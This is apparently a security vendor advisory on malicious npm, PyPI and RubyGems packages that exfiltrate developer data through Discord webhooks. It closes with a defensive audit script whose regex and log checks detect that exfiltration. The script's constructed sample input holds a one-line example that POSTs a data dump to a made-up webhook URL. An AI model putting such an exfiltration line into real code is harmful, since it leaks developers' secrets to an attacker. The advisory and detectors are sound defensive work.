Threat Advisories

npm, PyPI, and RubyGems Packages Discovered Sending Developer Data to Discord Channels

Written by Integrity360 | Oct 14, 2025 8:34:12 AM

Security researchers have uncovered multiple malicious packages distributed through npm, PyPI, and RubyGems that quietly send stolen developer data to Discord channels. The attackers use Discord webhooks as a lightweight command-and-control (C2) and exfiltration channel, exploiting their simplicity: a webhook URL embeds its own identifier and token, so anyone holding the URL can POST to it with no further authentication, and the traffic is ordinary HTTPS to discord.com. Because webhook URLs are "write-only", a defender who recovers one from a package cannot use it to read back, review, or delete the data already sent to the attacker's channel. 


Several packages were found misusing this technique. The npm package mysql-dumpdiscord exfiltrates sensitive configuration files such as .env and config.json; nodejs.discord uses webhooks for alerts; the Python packages malinssx, malicus, and maliinn send data to Discord channels as soon as they are installed, before any of their code is imported; and the RubyGem sqlcommenter_rails transmits host information and critical files such as /etc/passwd to an attacker-controlled webhook. By using Discord webhooks, threat actors avoid the cost and detection risk of standing up their own infrastructure, and their exfiltration blends into normal traffic to a domain that is widely allow-listed. 


In parallel, researchers also detected a large-scale campaign by North Korean threat actors linked to Contagious Interview, which flooded npm with over 300 malicious packages downloaded more than 50,000 times. The group used fake developer personas to lure victims, mainly Web3, crypto, and blockchain developers, into cloning repositories that referenced these infected packages. Once executed, the malware, including BeaverTail and InvisibleFerret, harvested credentials, crypto wallets, keystrokes, and screenshots, often delivered through typosquatted libraries mimicking legitimate ones such as dotenv or ethers.js. 


This campaign shows an increasingly industrialised approach to software supply chain attacks: removing individual malicious packages is not enough while the publisher accounts behind them remain active and can simply upload replacements under new names. 


What you should do 


Developers and organisations should immediately audit their projects for any dependencies matching the listed malicious packages and remove them. Check lockfiles (package-lock.json, requirements or poetry lockfiles, Gemfile.lock) rather than only top-level manifests, since a malicious package can arrive as a transitive dependency. Avoid installing packages from unverified or newly created accounts, and treat any Discord webhook URL found inside a dependency's source as an indicator of compromise. Use tools that monitor for typosquatting and suspicious dependencies, and isolate build environments from sensitive credentials so that an install-time hook has nothing worth stealing. If an affected package was present, rotate the secrets it could have read (API keys, tokens, and everything in .env files), not just the files themselves. Enforce multi-layered monitoring to detect exfiltration through legitimate-looking channels such as Discord; for example, build and CI hosts rarely have a reason to POST to discord.com/api/webhooks, so outbound requests to that path from them can be blocked or alerted on. 
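The following script is an added example written for this advisory, not code from Integrity360 or from the research it summarises. It implements the audit and detection steps above in one place: it searches lockfiles for the package names listed in this bulletin (direct and transitive dependencies), scans dependency source for embedded Discord webhook URLs, and flags POSTs to a webhook in an egress log. All lockfile contents, source snippets, the webhook id/token, and the log line format are constructed for the example; the log format in particular is an assumption, so adapt flag_webhook_egress to your proxy's real format.

```python
"""Audit lockfiles for the packages named in this advisory and look for Discord
webhook URLs in dependency sources and in egress logs.  All sample inputs are
constructed for this example; the webhook id/token below is made up."""
import json
import re

# Package names as listed in the advisory, keyed by ecosystem.
ADVISORY_PACKAGES = {
    "npm": {"mysql-dumpdiscord", "nodejs.discord"},
    "pypi": {"malinssx", "malicus", "maliinn"},
    "rubygems": {"sqlcommenter_rails"},
}

# A Discord webhook URL carries its own id and token, so possession of the URL
# is all a package needs to POST data out; that is the string to hunt for.
WEBHOOK_RE = re.compile(
    r"https?://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)


def npm_deps(lock_text):
    """Every package (direct and transitive) in a package-lock.json."""
    lock = json.loads(lock_text)
    names = set()
    for path in lock.get("packages", {}):          # lockfileVersion 2/3
        if path:                                    # "" is the root project
            names.add(path.rsplit("node_modules/", 1)[-1])
    names.update(lock.get("dependencies", {}))      # lockfileVersion 1
    return names


def pypi_deps(req_text):
    """Names from requirements.txt, normalised the way PyPI does (PEP 503)."""
    names = set()
    for line in req_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):        # skip blanks and options like -r
            continue
        name = re.split(r"[<>=!~\[;@ ]", line, maxsplit=1)[0]
        names.add(re.sub(r"[-_.]+", "-", name).lower())
    return names


def gem_deps(lock_text):
    """Gem names from the specs section of a Gemfile.lock: four-space indent
    followed by 'name (version)'; deeper indents are sub-dependencies."""
    return set(re.findall(r"^    (\S+) \(", lock_text, flags=re.MULTILINE))


def find_advisory_packages(npm_lock, requirements, gemfile_lock):
    """Return {ecosystem: [matching names]} for any advisory package present."""
    installed = {
        "npm": npm_deps(npm_lock),
        "pypi": pypi_deps(requirements),
        "rubygems": gem_deps(gemfile_lock),
    }
    hits = {eco: sorted(installed[eco] & ADVISORY_PACKAGES[eco]) for eco in installed}
    return {eco: names for eco, names in hits.items() if names}


def find_webhook_urls(sources):
    """sources: {path: file text}. Return {path: [webhook URLs]} for files that embed one."""
    return {path: WEBHOOK_RE.findall(text) for path, text in sources.items()
            if WEBHOOK_RE.search(text)}


def flag_webhook_egress(log_lines):
    """Flag proxy log lines that POST to a Discord webhook.  Assumed (constructed)
    line format: '<timestamp> <source-host> <method> <url> <status>'."""
    flagged = []
    for line in log_lines:
        parts = line.split()
        if len(parts) >= 4 and parts[2] == "POST" and WEBHOOK_RE.match(parts[3]):
            flagged.append((parts[0], parts[1], parts[3]))
    return flagged


# --- constructed sample inputs ---------------------------------------------
SAMPLE_NPM_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/mysql-dumpdiscord": {"version": "1.0.0"},
    },
})
SAMPLE_REQUIREMENTS = "requests==2.32.3\nMalicus==0.1  # looks harmless in review\n-r extra.txt\n"
SAMPLE_GEMFILE_LOCK = (
    "GEM\n  remote: https://rubygems.org/\n  specs:\n"
    "    rails (7.1.3)\n      actionpack (= 7.1.3)\n"
    "    sqlcommenter_rails (0.1.0)\n\nDEPENDENCIES\n  rails\n  sqlcommenter_rails\n"
)
FAKE_WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/AbCdEf_example-token"
SAMPLE_SOURCES = {
    "node_modules/express/index.js": "module.exports = require('./lib/express');\n",
    "node_modules/mysql-dumpdiscord/index.js":
        "const hook = '%s';\nfetch(hook, {method: 'POST', body: dump});\n" % FAKE_WEBHOOK,
}
SAMPLE_EGRESS_LOG = [
    "2025-10-14T08:34:12Z build-01 GET https://registry.npmjs.org/express 200",
    "2025-10-14T08:34:15Z build-01 POST %s 204" % FAKE_WEBHOOK,
    "2025-10-14T08:34:16Z build-01 GET https://discord.com/api/v10/gateway 200",
]

if __name__ == "__main__":
    print(find_advisory_packages(SAMPLE_NPM_LOCK, SAMPLE_REQUIREMENTS, SAMPLE_GEMFILE_LOCK))
    print(find_webhook_urls(SAMPLE_SOURCES))
    print(flag_webhook_egress(SAMPLE_EGRESS_LOG))
```

Run against real files, the lockfile readers give you the full transitive set, which is the set that matters: the typosquatted package in the Contagious Interview campaign may sit several levels below anything you chose to install. The webhook regex also matches the legacy discordapp.com host and subdomains such as canary.discord.com; the egress check deliberately ignores non-webhook Discord traffic so that developers who legitimately use the client are not flagged.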


If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.